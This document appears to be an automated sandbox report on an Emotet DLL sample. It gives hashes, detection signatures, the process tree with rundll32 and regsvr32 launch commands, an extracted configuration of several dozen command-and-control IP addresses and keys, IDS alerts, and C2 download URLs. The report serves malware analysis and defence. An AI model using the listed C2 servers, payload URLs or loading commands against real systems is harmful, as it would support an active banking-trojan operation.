Edit tour

Windows Analysis Report
DVvzRulsoR.exe

Overview

General Information

Sample Name:	DVvzRulsoR.exe (renamed file extension from exe to dll)
Analysis ID:	745057
MD5:	c9d4c1c3f8729727c29e257f612e019f
SHA1:	15dd4aedf9f79cabbc8c0b057f6a0f9437c9ede7
SHA256:	030eb0fa76d1329d836619c55778968fc664186642fbb16df30ec1be10396fc9
Tags:	dllexe
Infos:

Detection

Emotet

Score:	84
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Yara detected Emotet

System process connects to network (likely due to code injection or exploit)

Snort IDS alert for network traffic

Creates an autostart registry key pointing to binary in C:\Windows

C2 URLs / IPs found in malware configuration

Hides that the sample has been downloaded from the Internet (zone.identifier)

Queries the volume information (name, serial number etc) of a device

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Deletes files inside the Windows folder

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Creates files inside the system directory

PE file contains sections with non-standard names

Internet Provider seen in connection with other malware

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

IP address seen in connection with other malware

Tries to load missing DLLs

Drops PE files to the windows directory (C:\Windows)

Connects to several IPs in different countries

Registers a DLL

Found large amount of non-executed APIs

Uses Microsoft's Enhanced Cryptographic Provider

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w10x64

loaddll64.exe (PID: 4084 cmdline: loaddll64.exe "C:\Users\user\Desktop\DVvzRulsoR.dll" MD5: C676FC0263EDD17D4CE7D644B8F3FCD6)

conhost.exe (PID: 2824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 1348 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\DVvzRulsoR.dll",#1 MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

rundll32.exe (PID: 4180 cmdline: rundll32.exe "C:\Users\user\Desktop\DVvzRulsoR.dll",#1 MD5: 73C519F050C20580F8A62C849D49215A)

regsvr32.exe (PID: 4980 cmdline: C:\Windows\system32\regsvr32.exe "C:\Windows\system32\XbzeDYiEMjhuDu\OFkfcZsheb.dll" MD5: D78B75FC68247E8A63ACBA846182740E)

regsvr32.exe (PID: 1252 cmdline: regsvr32.exe /s C:\Users\user\Desktop\DVvzRulsoR.dll MD5: D78B75FC68247E8A63ACBA846182740E)

regsvr32.exe (PID: 5536 cmdline: C:\Windows\system32\regsvr32.exe "C:\Windows\system32\XvLyRsZAjXO\BWic.dll" MD5: D78B75FC68247E8A63ACBA846182740E)

rundll32.exe (PID: 1244 cmdline: rundll32.exe C:\Users\user\Desktop\DVvzRulsoR.dll,DllRegisterServer MD5: 73C519F050C20580F8A62C849D49215A)

regsvr32.exe (PID: 2008 cmdline: C:\Windows\system32\regsvr32.exe "C:\Windows\system32\OjshMzvO\drOxhskRmolSyam.dll" MD5: D78B75FC68247E8A63ACBA846182740E)

regsvr32.exe (PID: 5892 cmdline: C:\Windows\system32\regsvr32.exe "C:\Windows\system32\HAZEhjzZpU\MdCGCivK.dll" MD5: D78B75FC68247E8A63ACBA846182740E)

regsvr32.exe (PID: 5180 cmdline: C:\Windows\system32\regsvr32.exe" "C:\Windows\system32\XbzeDYiEMjhuDu\OFkfcZsheb.dll MD5: D78B75FC68247E8A63ACBA846182740E)

regsvr32.exe (PID: 1776 cmdline: C:\Windows\system32\regsvr32.exe "C:\Users\user\AppData\Local\PbznyUjcmjZG\mlrNU.dll" MD5: D78B75FC68247E8A63ACBA846182740E)

cleanup

Malware Configuration

Threatname: Emotet

{"C2 list": ["172.105.115.71:8080", "218.38.121.17:443", "186.250.48.5:443", "103.71.99.57:8080", "85.214.67.203:8080", "85.25.120.45:8080", "139.196.72.155:8080", "103.85.95.4:8080", "198.199.70.22:8080", "209.239.112.82:8080", "78.47.204.80:443", "36.67.23.59:443", "104.244.79.94:443", "62.171.178.147:8080", "195.77.239.39:8080", "103.56.149.105:8080", "80.211.107.116:8080", "93.104.209.107:8080", "174.138.33.49:7080", "202.28.34.99:8080", "178.62.112.199:8080", "114.79.130.68:443", "118.98.72.86:443", "103.41.204.169:8080", "178.238.225.252:8080", "83.229.80.93:8080", "46.101.98.60:8080", "82.98.180.154:7080", "87.106.97.83:7080", "196.44.98.190:8080", "139.59.80.108:8080", "103.224.241.74:8080", "103.254.12.236:7080", "185.148.169.10:8080", "165.22.254.236:8080", "37.44.244.177:8080", "54.37.228.122:443", "51.75.33.122:443", "128.199.217.206:443", "188.165.79.151:443", "210.57.209.142:8080", "160.16.143.191:8080", "175.126.176.79:8080", "202.134.4.210:7080", "103.126.216.86:443", "190.145.8.4:443", "128.199.242.164:8080", "64.227.55.231:8080"], "Public Key": ["RUNTMSAAAAD0LxqDNhonUYwk8sqo7IWuUllRdUiUBnACc6romsQoe1YJD7wIe4AheqYofpZFucPDXCZ0z9i+ooUffqeoLZU0h/Z+HXklAJA=", "RUNLMSAAAADYNZPXY4tQxd/N4Wn5sTYAm5tUOxY2ol1ELrI4MNhHNi640vSLasjYTHpFRBoG+o84vtr7AJachCzOHjaAJFCWPPWxHVoWAIg="]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000004.00000002.319410321.0000000180001000.00000020.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000004.00000002.319556168.000001D380100000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000000.00000002.322582436.0000000180001000.00000020.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000003.00000002.324141127.0000000180001000.00000020.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000006.00000002.824832389.0000000180001000.00000020.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000C.00000002.473975639.0000000002190000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000005.00000002.321746653.0000020F583F0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000006.00000002.824606786.0000000002A20000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000005.00000002.321330759.0000000180001000.00000020.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000000.00000002.324074867.000001D0BF950000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000003.00000002.323254712.0000000000970000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000C.00000002.474190042.0000000180001000.00000020.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
Click to see the 7 entries

Unpacked PEs

Source	Rule	Description	Author
6.2.regsvr32.exe.2a20000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0.2.loaddll64.exe.1d0bf950000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
12.2.regsvr32.exe.2190000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
3.2.regsvr32.exe.970000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
5.2.rundll32.exe.20f583f0000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
6.2.regsvr32.exe.2a20000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
12.2.regsvr32.exe.2190000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0.2.loaddll64.exe.1d0bf950000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
4.2.rundll32.exe.1d380100000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
5.2.rundll32.exe.20f583f0000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
3.2.regsvr32.exe.970000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
4.2.rundll32.exe.1d380100000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
Click to see the 7 entries

Snort Signatures

ET CNC Feodo Tracker Reported CnC Server TCP group 3 - Source IP: 192.168.2.5 - Destination IP: 115.178.55.22

Timestamp:	192.168.2.5115.178.55.2249707802404304 11/13/22-18:35:31.861704
SID:	2404304
Source Port:	49707
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: DVvzRulsoR.dll

Virustotal: Detection: 43%

Perma Link

Source: 00000006.00000002.824232509.0000000000EE5000.00000004.00000020.00020000.00000000.sdmp

Malware Configuration Extractor: Emotet {"C2 list": ["172.105.115.71:8080", "218.38.121.17:443", "186.250.48.5:443", "103.71.99.57:8080", "85.214.67.203:8080", "85.25.120.45:8080", "139.196.72.155:8080", "103.85.95.4:8080", "198.199.70.22:8080", "209.239.112.82:8080", "78.47.204.80:443", "36.67.23.59:443", "104.244.79.94:443", "62.171.178.147:8080", "195.77.239.39:8080", "103.56.149.105:8080", "80.211.107.116:8080", "93.104.209.107:8080", "174.138.33.49:7080", "202.28.34.99:8080", "178.62.112.199:8080", "114.79.130.68:443", "118.98.72.86:443", "103.41.204.169:8080", "178.238.225.252:8080", "83.229.80.93:8080", "46.101.98.60:8080", "82.98.180.154:7080", "87.106.97.83:7080", "196.44.98.190:8080", "139.59.80.108:8080", "103.224.241.74:8080", "103.254.12.236:7080", "185.148.169.10:8080", "165.22.254.236:8080", "37.44.244.177:8080", "54.37.228.122:443", "51.75.33.122:443", "128.199.217.206:443", "188.165.79.151:443", "210.57.209.142:8080", "160.16.143.191:8080", "175.126.176.79:8080", "202.134.4.210:7080", "103.126.216.86:443", "190.145.8.4:443", "128.199.242.164:8080", "64.227.55.231:8080"], "Public Key": ["RUNTMSAAAAD0LxqDNhonUYwk8sqo7IWuUllRdUiUBnACc6romsQoe1YJD7wIe4AheqYofpZFucPDXCZ0z9i+ooUffqeoLZU0h/Z+HXklAJA=", "RUNLMSAAAADYNZPXY4tQxd/N4Wn5sTYAm5tUOxY2ol1ELrI4MNhHNi640vSLasjYTHpFRBoG+o84vtr7AJachCzOHjaAJFCWPPWxHVoWAIg="]}

Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_00007FFA09509410 CryptStringToBinaryA,CryptStringToBinaryA,		0_2_00007FFA09509410
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_00007FFA09509410 CryptStringToBinaryA,CryptStringToBinaryA,		3_2_00007FFA09509410

Source: DVvzRulsoR.dll

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT

Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_00007FFA094FC334 FindFirstFileExW,		0_2_00007FFA094FC334
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_00007FFA094FC334 FindFirstFileExW,		3_2_00007FFA094FC334

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\regsvr32.exe	Network Connect: 115.178.55.22 80			Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Network Connect: 172.105.115.71 8080			Jump to behavior

Snort IDS alert for network traffic

Source: Traffic

Snort IDS: 2404304 ET CNC Feodo Tracker Reported CnC Server TCP group 3 192.168.2.5:49707 -> 115.178.55.22:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	IPs: 172.105.115.71:8080
Source: Malware configuration extractor	IPs: 218.38.121.17:443
Source: Malware configuration extractor	IPs: 186.250.48.5:443
Source: Malware configuration extractor	IPs: 103.71.99.57:8080
Source: Malware configuration extractor	IPs: 85.214.67.203:8080
Source: Malware configuration extractor	IPs: 85.25.120.45:8080
Source: Malware configuration extractor	IPs: 139.196.72.155:8080
Source: Malware configuration extractor	IPs: 103.85.95.4:8080
Source: Malware configuration extractor	IPs: 198.199.70.22:8080
Source: Malware configuration extractor	IPs: 209.239.112.82:8080
Source: Malware configuration extractor	IPs: 78.47.204.80:443
Source: Malware configuration extractor	IPs: 36.67.23.59:443
Source: Malware configuration extractor	IPs: 104.244.79.94:443
Source: Malware configuration extractor	IPs: 62.171.178.147:8080
Source: Malware configuration extractor	IPs: 195.77.239.39:8080
Source: Malware configuration extractor	IPs: 103.56.149.105:8080
Source: Malware configuration extractor	IPs: 80.211.107.116:8080
Source: Malware configuration extractor	IPs: 93.104.209.107:8080
Source: Malware configuration extractor	IPs: 174.138.33.49:7080
Source: Malware configuration extractor	IPs: 202.28.34.99:8080
Source: Malware configuration extractor	IPs: 178.62.112.199:8080
Source: Malware configuration extractor	IPs: 114.79.130.68:443
Source: Malware configuration extractor	IPs: 118.98.72.86:443
Source: Malware configuration extractor	IPs: 103.41.204.169:8080
Source: Malware configuration extractor	IPs: 178.238.225.252:8080
Source: Malware configuration extractor	IPs: 83.229.80.93:8080
Source: Malware configuration extractor	IPs: 46.101.98.60:8080
Source: Malware configuration extractor	IPs: 82.98.180.154:7080
Source: Malware configuration extractor	IPs: 87.106.97.83:7080
Source: Malware configuration extractor	IPs: 196.44.98.190:8080
Source: Malware configuration extractor	IPs: 139.59.80.108:8080
Source: Malware configuration extractor	IPs: 103.224.241.74:8080
Source: Malware configuration extractor	IPs: 103.254.12.236:7080
Source: Malware configuration extractor	IPs: 185.148.169.10:8080
Source: Malware configuration extractor	IPs: 165.22.254.236:8080
Source: Malware configuration extractor	IPs: 37.44.244.177:8080
Source: Malware configuration extractor	IPs: 54.37.228.122:443
Source: Malware configuration extractor	IPs: 51.75.33.122:443
Source: Malware configuration extractor	IPs: 128.199.217.206:443
Source: Malware configuration extractor	IPs: 188.165.79.151:443
Source: Malware configuration extractor	IPs: 210.57.209.142:8080
Source: Malware configuration extractor	IPs: 160.16.143.191:8080
Source: Malware configuration extractor	IPs: 175.126.176.79:8080
Source: Malware configuration extractor	IPs: 202.134.4.210:7080
Source: Malware configuration extractor	IPs: 103.126.216.86:443
Source: Malware configuration extractor	IPs: 190.145.8.4:443
Source: Malware configuration extractor	IPs: 128.199.242.164:8080
Source: Malware configuration extractor	IPs: 64.227.55.231:8080

Source: Joe Sandbox View

ASN Name: LINODE-APLinodeLLCUS LINODE-APLinodeLLCUS

Source: Joe Sandbox View	IP Address: 172.105.115.71 172.105.115.71
Source: Joe Sandbox View	IP Address: 188.165.79.151 188.165.79.151

Source: unknown

Network traffic detected: IP country count 20

Source: unknown	TCP traffic detected without corresponding DNS query: 115.178.55.22
Source: unknown	TCP traffic detected without corresponding DNS query: 115.178.55.22
Source: unknown	TCP traffic detected without corresponding DNS query: 115.178.55.22
Source: unknown	TCP traffic detected without corresponding DNS query: 172.105.115.71
Source: unknown	TCP traffic detected without corresponding DNS query: 172.105.115.71
Source: unknown	TCP traffic detected without corresponding DNS query: 172.105.115.71
Source: unknown	TCP traffic detected without corresponding DNS query: 172.105.115.71
Source: unknown	TCP traffic detected without corresponding DNS query: 172.105.115.71
Source: unknown	TCP traffic detected without corresponding DNS query: 172.105.115.71
Source: unknown	TCP traffic detected without corresponding DNS query: 172.105.115.71
Source: unknown	TCP traffic detected without corresponding DNS query: 172.105.115.71
Source: unknown	TCP traffic detected without corresponding DNS query: 172.105.115.71
Source: unknown	TCP traffic detected without corresponding DNS query: 172.105.115.71
Source: unknown	TCP traffic detected without corresponding DNS query: 172.105.115.71
Source: unknown	TCP traffic detected without corresponding DNS query: 172.105.115.71

Source: regsvr32.exe, 00000006.00000003.558910683.0000000000F57000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.430259794.0000000000F47000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.559208847.0000000000F57000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.559629676.0000000000F57000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.824333519.0000000000F57000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.559371603.0000000000FB2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: regsvr32.exe, 00000006.00000003.426597475.0000000000FAD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.427222697.0000000000F94000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/
Source: regsvr32.exe, 00000006.00000003.427222697.0000000000F94000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/OID
Source: regsvr32.exe, 00000006.00000002.824281684.0000000000F1A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.430194281.0000000000F0E000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.558550380.0000000000F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.559388990.0000000000F19000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.430473686.0000000000F0E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: regsvr32.exe, 00000006.00000002.824193744.0000000000ECA000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.6.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: regsvr32.exe, 00000006.00000003.427206451.0000000000F8E000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.427599577.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab/(
Source: regsvr32.exe, 00000006.00000003.430227487.0000000000F2D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.559120829.0000000000F34000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.430387158.0000000000F30000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.824232509.0000000000EE5000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.559685406.0000000000F35000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.824303850.0000000000F35000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://172.105.115.71:8080/dwhiakgtheb/puspmvuhrxeol/
Source: regsvr32.exe, 00000006.00000002.824281684.0000000000F1A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.430194281.0000000000F0E000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.558550380.0000000000F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.559388990.0000000000F19000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.430473686.0000000000F0E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://172.105.115.71:8080/s.dll

E-Banking Fraud

Yara detected Emotet

Source: Yara match	File source: 6.2.regsvr32.exe.2a20000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll64.exe.1d0bf950000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.regsvr32.exe.2190000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.regsvr32.exe.970000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.20f583f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.regsvr32.exe.2a20000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.regsvr32.exe.2190000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll64.exe.1d0bf950000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.1d380100000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.20f583f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.regsvr32.exe.970000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.1d380100000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.319410321.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.319556168.000001D380100000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.322582436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.324141127.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.824832389.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.473975639.0000000002190000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.321746653.0000020F583F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.824606786.0000000002A20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.321330759.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.324074867.000001D0BF950000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.323254712.0000000000970000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.474190042.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\Windows\System32\rundll32.exe

File deleted: C:\Windows\System32\XbzeDYiEMjhuDu\OFkfcZsheb.dll:Zone.Identifier

Jump to behavior

Source: C:\Windows\System32\loaddll64.exe

File created: C:\Windows\system32\HAZEhjzZpU\

Jump to behavior

Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_00007FFA09503FB0	0_2_00007FFA09503FB0
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_00007FFA09501910	0_2_00007FFA09501910
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_00007FFA094FABC0	0_2_00007FFA094FABC0
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_00007FFA094FC334	0_2_00007FFA094FC334
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_00007FFA094FA370	0_2_00007FFA094FA370
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180020454	0_2_0000000180020454
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180028C94	0_2_0000000180028C94
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_00000001800038A5	0_2_00000001800038A5
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_00000001800248E0	0_2_00000001800248E0
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180005DB4	0_2_0000000180005DB4
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180004DDC	0_2_0000000180004DDC
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_000000018000B1E0	0_2_000000018000B1E0
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180009E38	0_2_0000000180009E38
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180003BE8	0_2_0000000180003BE8
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180009BEC	0_2_0000000180009BEC
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_00000001800173F8	0_2_00000001800173F8
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180017BF8	0_2_0000000180017BF8
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180015400	0_2_0000000180015400
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180001000	0_2_0000000180001000
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_000000018000741C	0_2_000000018000741C
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_000000018000E828	0_2_000000018000E828
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180002834	0_2_0000000180002834
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180014C48	0_2_0000000180014C48
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_000000018002005C	0_2_000000018002005C
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180016464	0_2_0000000180016464
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180005478	0_2_0000000180005478
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180006880	0_2_0000000180006880
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_000000018002748C	0_2_000000018002748C
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_000000018001308C	0_2_000000018001308C
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180024098	0_2_0000000180024098
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_000000018001B898	0_2_000000018001B898
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_000000018000C498	0_2_000000018000C498
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180004CA0	0_2_0000000180004CA0
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_00000001800110AC	0_2_00000001800110AC
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_00000001800148B0	0_2_00000001800148B0
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_00000001800078B6	0_2_00000001800078B6
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180001CCC	0_2_0000000180001CCC
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_000000018000B8D0	0_2_000000018000B8D0
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_00000001800198DC	0_2_00000001800198DC
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_00000001800038DC	0_2_00000001800038DC
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_00000001800264F8	0_2_00000001800264F8
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_00000001800084F8	0_2_00000001800084F8
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_000000018000BD00	0_2_000000018000BD00
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180015508	0_2_0000000180015508
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180018D0C	0_2_0000000180018D0C
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180012110	0_2_0000000180012110
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_000000018001B520	0_2_000000018001B520
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180029124	0_2_0000000180029124
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180013524	0_2_0000000180013524
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180009D24	0_2_0000000180009D24
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180023D28	0_2_0000000180023D28
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180002128	0_2_0000000180002128
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180020930	0_2_0000000180020930
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180009144	0_2_0000000180009144
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_000000018001F550	0_2_000000018001F550
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180020D54	0_2_0000000180020D54
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180010954	0_2_0000000180010954
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180018560	0_2_0000000180018560
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_000000018000E570	0_2_000000018000E570
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_000000018001C974	0_2_000000018001C974
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_000000018000F174	0_2_000000018000F174
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180025D84	0_2_0000000180025D84
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180005590	0_2_0000000180005590
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180017198	0_2_0000000180017198
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_00000001800159A0	0_2_00000001800159A0
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180011DAC	0_2_0000000180011DAC
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_000000018000D1AC	0_2_000000018000D1AC
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_00000001800069C0	0_2_00000001800069C0
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_000000018000A1D4	0_2_000000018000A1D4
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_00000001800079D8	0_2_00000001800079D8
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_000000018001C1DC	0_2_000000018001C1DC
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_000000018000D1E0	0_2_000000018000D1E0
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_00000001800199E8	0_2_00000001800199E8
